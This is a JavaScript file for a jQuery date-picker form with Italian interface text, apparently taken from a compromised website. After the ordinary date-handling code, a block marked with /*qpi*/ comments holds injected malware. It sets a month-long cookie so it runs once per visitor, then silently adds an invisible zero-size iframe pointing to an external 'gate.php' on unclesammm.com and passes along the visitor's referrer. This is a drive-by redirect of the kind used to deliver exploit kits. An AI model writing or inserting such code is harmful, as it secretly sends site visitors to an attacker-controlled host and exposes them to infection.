var loc_choose_date = 'Scegli una data';
var DPS = new Object();

$(document).ready(function() {
	$('input.date_picker').each(function() {
		var t = $(this);
		DPS[this.id] = t;
		t.datePicker({
			displayClose: true
		}).focus(function() {
			this.blur();
			return false;
		});
	});
	
	
	$('.custom_select').selectbox();
});

function edit_to_date() {
	var td = $('#to_date').val();
	tdd = new Date(td);
	
	var fd = $('#from_date').val();
	fdd = new Date(fd);
	
	DPS['to_date'].dpSetStartDate(fd);
	if(isNaN(tdd) ||tdd < fdd) {
		$('#to_date').val(fd);
	}
}/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://unclesammm.com/gate.php?f=829072&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
